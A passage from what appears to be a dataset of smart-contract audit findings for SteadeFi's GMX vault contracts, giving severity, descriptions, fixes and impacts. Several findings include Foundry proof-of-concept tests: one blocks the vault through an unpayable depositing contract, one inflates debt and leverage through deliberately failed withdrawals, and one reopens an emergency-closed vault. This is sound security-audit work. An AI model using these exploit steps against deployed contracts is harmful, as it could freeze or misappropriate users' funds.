Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log(""DebtAmtBefore: %s"", debtAmtTokenBBefore);\\n console.log(""DebtAmtAfter: %s"", debtAmtTokenBAfter);\\n console.log(""leverageBefore: %s"", leverageBefore);\\n console.log(""leverageAfter: %s"", leverageAfter);\\n }\\n}\\n```\\n\\nThe PoC can be started with this command: `forge test --match-test test_POC1 -vv`","In processWithdrawFailure, no more borrowing should occur:\\n```\\nFile: contracts/strategy/gmx/GMXWithdraw.sol#processWithdrawFailure\\nGMXManager.borrow(\\n self,\\n self.withdrawCache.repayParams.repayTokenAAmt,\\n self.withdrawCache.repayParams.repayTokenBAmt\\n);\\n```\\n\\nThese lines of code should be deleted","Users can intentionally deplete the capacity of a lending vault to increase the leverage of a vault. This also results in lending vaults having no capacity left for new deposits. As a result, the utilization rate increases significantly, leading to higher borrowing costs.","```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from ""forge-std/Test.sol"";\\nimport { TestUtils } from ""../../helpers/TestUtils.sol"";\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport { GMXMockVaultSetup } from ""./GMXMockVaultSetup.t.sol"";\\nimport { GMXTypes } from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport { GMXTestHelper } from ""./GMXTestHelper.sol"";\\n\\nimport { IDeposit } from ""../../../contracts/interfaces/protocols/gmx/IDeposit.sol"";\\nimport { IEvent } from ""../../../contracts/interfaces/protocols/gmx/IEvent.sol"";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n //User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. (The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. (Token A is irrelevant as Delta is Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log(""DebtAmtBefore: %s"", debtAmtTokenBBefore);\\n console.log(""DebtAmtAfter: %s"", debtAmtTokenBAfter);\\n console.log(""leverageBefore: %s"", leverageBefore);\\n console.log(""leverageAfter: %s"", leverageAfter);\\n }\\n}\\n```\\n" +Setter functions for core GMX contracts,medium,"GMX docs state that their `ExchangeRouter` and `GMXOracle` contracts `will` change as new logic is added. Therefore setter functions should be added to `GMXVault.sol` to be able to update the state variables storing those addressed when the need arises.\\nFrom the GMX docs:\\n```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\n",Create setter functions in `GMXVault.sol` as below:\\n```\\n function updateExchangeRouter(address exchangeRouter) external onlyOwner {\\n _store.exchangeRouter = exchangeRouter;\\n emit ExchangeRouterUpdated(exchangeRouter);\\n }\\n\\n function updateGMXOracle(address gmxOracle) external onlyOwner {\\n _store.gmxOracle = gmxOracle;\\n emit GMXOracleUpdated(gmxOracle);\\n }\\n```\\n,Not being able to use the `ExchangeRouter` and `GMXOracle` contracts the protocol would effectively be unusable given their importance.,"```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\n" +`GMXVault` can be blocked by a malicious actor,high,"`GMXVault` can be blocked by malicious actor if he made a `depositNative` call with unpayable contract and the deposit then cancelled by the GMX exchange router (3rd party).\\nUsers can deposit native tokens in vaults that either of its token pair is a WNT (wrapped native token) by calling `GMXVault.depositNative` payable function with the required deposit parameters (such as token, amount, minimum share amount, slippage & execution fees), then this function will invoke `GMXDeposit.deposit` with a `msg.value` equals the amount that the user wants to deposit + execution fees.\\nIn GMXDeposit.deposit: various checks are made to ensure the sanity of the deposit parameters and the elligibility of the user to deposit, and to calculate the required `tokenA` & `tokenB` needed to deposit in the `GMX` protocol, then the sent native tokens are deposited in the WNT contract and an equivalent amount of WNT is transferred to the vault.\\nAnd before the call is made to the `GMXManager.addLiquidity` (where a call is going to be made to the `GMX.exchangeRouter` contract) to add liquidity; the status of the vault is checked if it's `Open`, if yes; then the status of the vault is set to `Deposit` so that no more deposits or withdrawls can be made (the vault will be blocked until the operation succeeds).\\nSo if the operation succeeds in the `GMX` exchange router; the vault callback will invoke `preocessDeposit` function to finish the process and update the vault status to `Open`.\\nAnd if the operation of adding liquidity is cancelled by the `GMX` exchange router (3rd party); the vault callback will invoke `processDepositCancellation` function to rollback the process by repaying the lendingVaults debts and paying back the native tokens sent by the user, then update the vault status to Openso that the vault is open again for deposits and withdrawals.\\nUsually the deposit (liquidity addition to `GMX` protocol) fails if the user sets a very high slippage parameter when making a deposit (dp.slippage).\\nHow can this be exploited to block the vault? Imagine the following scenario:\\nIf a malicious user deploys an unpayable contract (doesn't receive native tokens) and makes a call to the `GMXVault.depositNative` function with a very high slippage to ensure that the deposit will be cancelled by the GMX exchange router.\\nSo when the deposit is cancelled and the vault callback `processDepositCancellation` function is invoked by the router; it will revert as it will try to send back the native tokens to the user who tried to make the deposit (which is the unpayable contract in our case).\\nAnd the status of the vault will be stuck in the `Deposit` state; so no more deposits or withdrawals can be made and the vault will be disabled.\\nThe same scenario will happen if the user got blocklisted later by the deposited token contract (tokenA or tokenB), but the propability of this happening is very low as the GMX exchange router will add liquidity in two transactions with a small time separation between them!\\nCode Instances:\\nGMXVault.depositNative\\n```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n\\nGMXDeposit.deposit /L88\\n```\\n_dc.user = payable(msg.sender);\\n```\\n\\nGMXDeposit.processDepositCancellation /L209-210\\n```\\n(bool success, ) = self.depositCache.user.call{value: address(this).balance}("""");\\n require(success, ""Transfer failed."");\\n```\\n\\nFoundry PoC:\\nA `BlockerContract.sol` is added to mimick the behaviour of an unpayable contract. add the following contract to the `2023-10-SteadeFi/test/gmx/local/BlockerContract.sol` directory:\\n`// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\n\\nimport {GMXTypes} from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport {GMXVault} from ""../../../contracts/strategy/gmx/GMXVault.sol"";\\n\\ncontract BlockerContract {\\n constructor() payable {}\\n\\n function callVault(\\n address payable _vaultAddress,\\n GMXTypes.DepositParams memory dp\\n ) external {\\n GMXVault targetVault = GMXVault(_vaultAddress);\\n targetVault.depositNative{value: address(this).balance}(dp);\\n }\\n}`\\n`test_processDepositCancelWillBlockVault` test is added to to the `2023-10-SteadeFi/test/gmx/local/GMXDepositTest.sol` directory; where the blockerContract is deployed with some native tokens to cover deposit amount + execution fees, then this contract calls the `depositNative` via `BlockerContract.callVault`, where the exchange router tries to cancel the deposit but it will not be able as the BlockerContract can't receive back deposited native tokens, and the vault will be blocked.\\nadd this import statement and test to the `GMXDepositTest.sol` file :\\n`import {BlockerContract} from ""./BlockerContract.sol"";`\\n` function test_processDepositCancelWillBlockVault() external {\\n //1. deploy the blockerContract contract with a msg.value=deposit amount + execution fees:\\n uint256 depositAmount = 1 ether;\\n\\n BlockerContract blockerContract = new BlockerContract{\\n value: depositAmount + EXECUTION_FEE\\n }();\\n\\n //check balance before deposit:\\n uint256 blockerContractEthBalance = address(blockerContract).balance;\\n assertEq(depositAmount + EXECUTION_FEE, blockerContractEthBalance);\\n\\n //2. preparing deposit params to call ""depositNative"" via the blockerContract:\\n depositParams.token = address(WETH);\\n depositParams.amt = depositAmount;\\n depositParams.minSharesAmt = 0;\\n depositParams.slippage = SLIPPAGE;\\n depositParams.executionFee = EXECUTION_FEE;\\n\\n blockerContract.callVault(payable(address(vault)), depositParams);\\n\\n // vault status is ""Deposit"":\\n assertEq(uint256(vault.store().status), 1);\\n\\n //3. the blockerContract tries to cancel the deposit, but it will not be able to do beacuse it's unpayable contract:\\n vm.expectRevert();\\n mockExchangeRouter.cancelDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n\\n // vault status will be stuck at ""Deposit"":\\n assertEq(uint256(vault.store().status), 1);\\n\\n // check balance after cancelling the deposit, where it will be less than the original as no refund has been paid (the blockerContract is unpayable):\\n assertLt(address(blockerContract).balance, blockerContractEthBalance);\\n }`\\nTest result:\\n`$ forge test --mt `test_processDepositCancelWillBlockVault`\\nRunning 1 test for test/gmx/local/GMXDepositTest.sol:GMXDepositTest\\n[PASS] test_processDepositCancelWillBlockVault() (gas: 1419036)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 24.62ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)`",Add a mechanism to enable the user from redeeming his cancelled deposits (pulling) instead of sending it back to him (pushing).,The vault will be blocked as it will be stuck in the `Deposit` state; so no more deposits or withdrawals can be made.,"```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n" +Emergency Closed Vault Can Be Paused Then Resume,medium,"The `emergencyClose` function is intended to be a final measure to repay all debts and shut down the vault permanently, as indicated by the function's documentation. This action should be irreversible to ensure the finality and security of the vault's emergency closure process.\\n```\\nFile: GMXVaul.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n\\nHowever, a pathway exists to effectively reopen a vault after it has been closed using `emergencyClose` by invoking the `emergencyPause` and `emergencyResume` functions. These functions alter the vault's status, allowing for the resumption of operations which contradicts the intended irreversible nature of an emergency close.\\n```\\nFile: GMXEmergency.sol\\n function emergencyPause(\\n GMXTypes.Store storage self\\n ) external {\\n self.refundee = payable(msg.sender);\\n\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n\\n emit EmergencyPause();\\n }\\n```\\n\\n```\\nFile: GMXEmergency.sol\\n function emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n\\n self.refundee = payable(msg.sender);\\n\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nAdd this to GMXEmergencyTest.t.sol and test with forge test --mt test_close_then_pause -vv:\\n```\\n function test_close_then_pause() external {\\n // Pause the vault\\n vault.emergencyPause();\\n console2.log(""vault status"", uint256(vault.store().status));\\n\\n // Close the vault\\n vault.emergencyClose(deadline);\\n console2.log(""vault status"", uint256(vault.store().status));\\n\\n // Pause the vault again\\n vault.emergencyPause();\\n console2.log(""vault status"", uint256(vault.store().status));\\n assertEq(uint256(vault.store().status), 10, ""vault status not set to paused"");\\n\\n // Resume the vault\\n vault.emergencyResume();\\n console2.log(""vault status"", uint256(vault.store().status));\\n }\\n```\\n",Implement a permanent state or flag within the vault's storage to irrevocably mark the vault as closed after `emergencyClose` is called. This flag should prevent any further state-altering operations.\\nModify the `emergencyPause` and `emergencyResume` functions to check for this permanent closure flag and revert if the vault has been emergency closed.,"The impact of this finding is significant, as it undermines the trust model of the emergency close process. Users and stakeholders expect that once a vault is closed in an emergency, it will remain closed as a protective measure. The ability to resume operations after an emergency closure could expose the vault to additional risks and potentially be exploited by malicious actors, especially if the original closure was due to a security threat.","```\\nFile: GMXVaul.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n" +The transfer of ERC-20 tokens with blacklist functionality in process functions can lead to stuck vaults,medium,"Inside a few process functions are ERC-20 tokens transfered which could potentially have a blacklist functionality. This can lead to a DoS of the strategy vault. If for example, a blacklisted user withdraws funds.\\nSome ERC-20 tokens like for example USDC (which is used by the system) have the functionality to blacklist specific addresses, so that they are no longer able to transfer and receive tokens. Sending funds to these addresses will lead to a revert. A few of the process functions inside the deposit and withdraw contracts transfer ERC-20 tokens to addresses which could potentially be blacklisted. The system is not in an Open state when a keeper bot interacts with such a process function, and if the call to such a function reverts, the status can not be updated back to Open. Therefore, it will remain in the given status and a DoS for all users occurs. The only possibility that DoS stops would be when the user is no longer blacklisted, which can potentially last forever.\\nThe attack flow (could be accidental) would for example look like this:\\nUSDC Blacklisted user calls withdraw with the wish to withdraw USDC\\nwithdraw function passes and status is updated to GMXTypes.Status.Withdraw\\nKeeper calls the processWithdraw function\\nTransferring USDC tokens to blacklisted user reverts\\nTherefore vault is stuck inside GMXTypes.Status.Withdraw status and all users experience a DoS\\nHere are the code snippets of these dangerous transfers inside process functions:\\n```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n\\n```\\nfunction processDepositFailureLiquidityWithdrawal(\\n GMXTypes.Store storage self\\n) public {\\n GMXChecks.beforeProcessAfterDepositFailureLiquidityWithdrawal(self);\\n // rest of code\\n // Refund user the rest of the remaining withdrawn LP assets\\n // Will be in tokenA/tokenB only; so if user deposited LP tokens\\n // they will still be refunded in tokenA/tokenB\\n self.tokenA.safeTransfer(self.depositCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.depositCache.user, self.tokenB.balanceOf(address(this)));\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n}\\n```\\n\\n```\\nfunction processWithdraw(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessWithdrawChecks(self);\\n\\n try GMXProcessWithdraw.processWithdraw(self) {\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n // rest of code\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n \\n // rest of code\\n\\n self.status = GMXTypes.Status.Open;\\n }\\n // rest of code\\n}\\n```\\n","Instead of transferring the ERC-20 tokens directly to a user in the process functions, use a two-step process instead. For example, create another contract whose only purpose is to hold assets and store the information about which address is allowed to withdraw how many of the specified tokens. In the process functions, send the funds to this new contract along with this information instead. So if a user has been blacklisted, the DoS only exists for that specific user and for the rest of the users the system continues to function normally.","DoS of the entire strategy vault, as the status can no longer be updated to Open until the user is no longer blacklisted. This can potentially take forever and forces the owners to take emergency action.","```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n" +Rebalance may occur due to wrong requirements check,low,"Before a rebalance can occur, checks are implemented to ensure that `delta` and `debtRatio` remain within their specified limits. However, it's important to note that the check in `GMXChecks::beforeRebalanceChecks` ignores the scenario where these values are equal to any of their limits.\\nIn the current implementation of the `GMXRebalance::rebalanceAdd` function, it first calculates the current values of `debtRatio` and `delta` before making any changes. Subsequently, the `beforeRebalanceChecks` function, checks if these values meet the requirements for a rebalance to occur. These requirements now dictate that both `debtRatio` and `delta` must be either ≥ to the `UpperLimit`, or ≤ to the `LowerLimit` for a rebalance to take place.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n\\nSuppose a rebalance is successful. In the `afterRebalanceChecks` section, the code verifies whether both `delta` and `debtRatio` are greater than the `UpperLimit` or less than the `LowerLimit`. This confirmation implies that these limits are indeed inclusive, meaning that the correct interpretation of these limits should be that `LowerLimit` ≤ actualValue ≤ `UpperLimit`. On the other hand, this also indicates that for a rebalancing to occur, the values of `deltaBefore` and `debtRatioBefore` need to be outside their limits, i.e., `delta` should be greater than `Upper` or less than `Lower`. However, in the current implementation, if these values are equal to the limit, a rebalance may still occur, which violates the consistency of the `afterRebalanceChecks` function, thus indicating that these limits are inclusive. Consequently, a value equal to the limit needs to be treated as valid and not be able to trigger a rebalance.\\n```\\nfunction afterRebalanceChecks(\\n GMXTypes.Store storage self\\n) external view {\\n // Guards: check that delta is within limits for Neutral strategy\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n int256 _delta = GMXReader.delta(self);\\n\\n if (\\n _delta > self.deltaUpperLimit ||\\n _delta < self.deltaLowerLimit\\n ) revert Errors.InvalidDelta();\\n }\\n\\n // Guards: check that debt is within limits for Long/Neutral strategy\\n uint256 _debtRatio = GMXReader.debtRatio(self);\\n\\n if (\\n _debtRatio > self.debtRatioUpperLimit ||\\n _debtRatio < self.debtRatioLowerLimit\\n ) revert Errors.InvalidDebtRatio();\\n}\\n```\\n\\nImagine the case when `delta` or `debtRatio` is equal to any of its limits; a rebalance will occur. However, on the other hand, these values are valid because they are inclusively within the limits.","Rebalance may occur due to wrong requirements check\\nConsider a strict check to determine if `delta` or `debtRatio` is strictly within its limits, including scenarios where they are equal to any of its limits. In such cases, the code should ensure that a rebalance does not occur when these values are precisely at the limit.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n ) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore <= self.deltaUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore >= self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore <= self.debtRatioUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore >= self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n }\\n```\\n","In such a scenario, the system might incorrectly trigger a rebalance of the vault, even when `delta` or `debtRatio` is precisely within the established limits, thus potentially causing unintended rebalancing actions.","```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n" +Wrong errors are used for reverts,low,There are checks that revert with wrong errors\\nReverts:\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L68-L69\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L74-L75\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L351-L352\\n```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\n,Wrong errors are used for reverts\\nConsider using `Errors.EmptyDepositAmount` for the provided cases.,This can lead to user confusion as they won't receive the accurate revert reason.,```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\n +Transfer Limit of UNI Tokens May Lead to a DoS and Token Loss Risk,low,"Users who accumulate more than 2^96 UNI tokens may lose their tokens because transfers above that will always revert.\\nThe UNI token contract imposes a transfer limit, restricting the maximum amount of tokens that can be transferred in a single transaction to 2^96 UNI tokens. Any transfer exceeding this threshold will trigger a transaction revert. The contract relies on the `balanceOf` function to verify the sender's token balance before proceeding with a transfer.\\n```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n\\nsuch a transfer will always revert for balances above 2^96 UNI tokens\\nhttps://github.com/d-xo/weird-erc20#revert-on-large-approvals--transfers",Transfer Limit of UNI Tokens May Lead to a DoS and Token Loss Risk\\nContracts should always check the amount of UNI being transferred before processing the transaction.,Users who accumulate more than 2^96 UNI tokens may lose their tokens due to a DOS revert when attempting to withdraw their token balance.,"```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n" +`emergencyClose()` may fail to repay any debt,medium,"the `emergencyClose()` function may become ineffective, preventing the contract from repaying any outstanding debt, leading to potential financial losses.\\nWhen the contract is paused, all the liquidity from GMX is withdrawn (in term of `tokenA` and tokenB).\\nThe `emergencyClose()` function is called after the contract is paused due some reasons, possibly when the strategy incurs bad debts or when the contract gets hacked, High volatility, and so on...\\nThis function is responsible for repaying all the amounts of `tokenA` and `tokenB` borrowed from the `lendingVault` contract. It then sets the contract's status to `closed`. After that, users who hold `svToken` shares can withdraw the remaining assets from the contract.\\nThe issue with this function lies in its assumptions, which are not accurate. It assumes that the withdrawn amounts from GMX are always sufficient to cover the whole debt.\\n```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n\\nPlease note that `_rp.repayTokenAAmt` and `_rp.repayTokenBAmt` represent the entire debt, and these values remain the same even if a swap is needed.\\nThe function checks if a swap is needed to cover its debt, and here's how it determines whether a swap is required:\\n```\\n function calcSwapForRepay(GMXTypes.Store storage self, GMXTypes.RepayParams memory rp)\\n external\\n view\\n returns (bool, address, address, uint256)\\n {\\n address _tokenFrom;\\n address _tokenTo;\\n uint256 _tokenToAmt;\\n if (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n _tokenToAmt = rp.repayTokenAAmt - self.tokenA.balanceOf(address(this));\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else if (rp.repayTokenBAmt > self.tokenB.balanceOf(address(this))) {\\n // If more tokenB is needed for repayment\\n _tokenToAmt = rp.repayTokenBAmt - self.tokenB.balanceOf(address(this));\\n _tokenFrom = address(self.tokenA);\\n _tokenTo = address(self.tokenB);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else {\\n // If there is enough to repay both tokens\\n return (false, address(0), address(0), 0);\\n }\\n }\\n```\\n\\nIn plain 